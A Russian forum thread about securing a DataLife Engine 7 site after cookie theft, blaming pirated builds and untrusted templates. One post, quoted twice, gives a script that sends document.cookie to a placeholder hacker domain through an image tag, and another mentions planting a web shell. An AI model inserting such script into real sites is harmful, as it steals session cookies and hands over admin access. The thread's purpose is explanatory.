• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Помощь [help] Защитить DLE 7

Статус
В этой теме нельзя размещать новые ответы.
Элементарно украли куки, по твоей же беспечности, уязвимостей в DLE нет. Причина - человечкский фактор. Так что не разводи кипишь и следи за СВОЕЙ информационной безопасностью внимательнее.:tcl:

Ну я бы не говорил так уверенно, например в 6.7 есть уязвимость....:)

Может быть, все мождет быть:)ИМХО шаблоны нужно заказывать у уже зарекомендовавших себя дизайнеров, а не там где дешевле...
 
Vvaann, а ты пользуешься легальной ДЛЕ или нуленой? Не посылает ли твоя ЦМС-ка письма с паролями админки на чей-то адрес? Контролируй отправляемую почту. Есть ли у тебя файрвол, может твои кукисы периодически становятся добычей кулхацкеров? Да и в браузерах вообще нельзя админские пароли сохранять.
 
Увы, нуленкой
 
Ну я бы не говорил так уверенно, например в 6.7 есть уязвимость....:)

Может быть, все мождет быть:)ИМХО шаблоны нужно заказывать у уже зарекомендовавших себя дизайнеров, а не там где дешевле...

Даже не представляю, как можно через шаблон DLE воровать админские пароли? :nezn: Подскажите плиз, чтобы тоже не проворонить!
 
Даже не представляю, как можно через шаблон DLE воровать админские пароли? Подскажите плиз, чтобы тоже не проворонить!

Элементарно, в любом месте шаблона прописывается

Код:
<script>
document.write('<img src="сайт_васи_пупкина_хакера.ru/?cookiesteeler"+document.cookie')
</script>

Или шелл в папке с шаблонами оставляет
 
Элементарно, в любом месте шаблона прописывается

Код:
<script>
document.write('<img src="сайт_васи_пупкина_хакера.ru/?cookiesteeler"+document.cookie')
</script>

Или шелл в папке с шаблонами оставляет

Ну, это возможно, только если куками пользуешься, и сохраняешь пароли в браузерах, так?
 
Нет

Не совсем, в дле или других нормальных движках куки используется всегда, и это возможно даже без сохранения паролей. Оно ворует "теперешние" куки, ты зашол под своим ником на сайт, перешол на страницу с XSS и все, твои куки с этого сайта улетели... Но только кто и как сможет в шаб залить XSS или шелл?) Если могут это залить в шаблон, тогда никакие пароли не нужны )) Тебе уже весь сайт открыт :-], ну если зарание в шаблон закинули это, тогда уже лучше кидать шелл... Ну все возможно )
 
Vvaann
Нулл откуда качал
 
раз пошло такое обсуждение, то вы все знаете, что на нулледе переодически у вас появляется сообщение, что ваш пароль устарел, смените его.... так вот, если какая реализация какого-нить хака на dle, такого же плана?
 
2. Изменить название файла admin.php на другое (не забыв прописать его в админке).

Сменой названия файла ничего не добьетесь,его можно легко узнать выбрав функцию исходного текста
var dle_admin = 'admin.php';
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху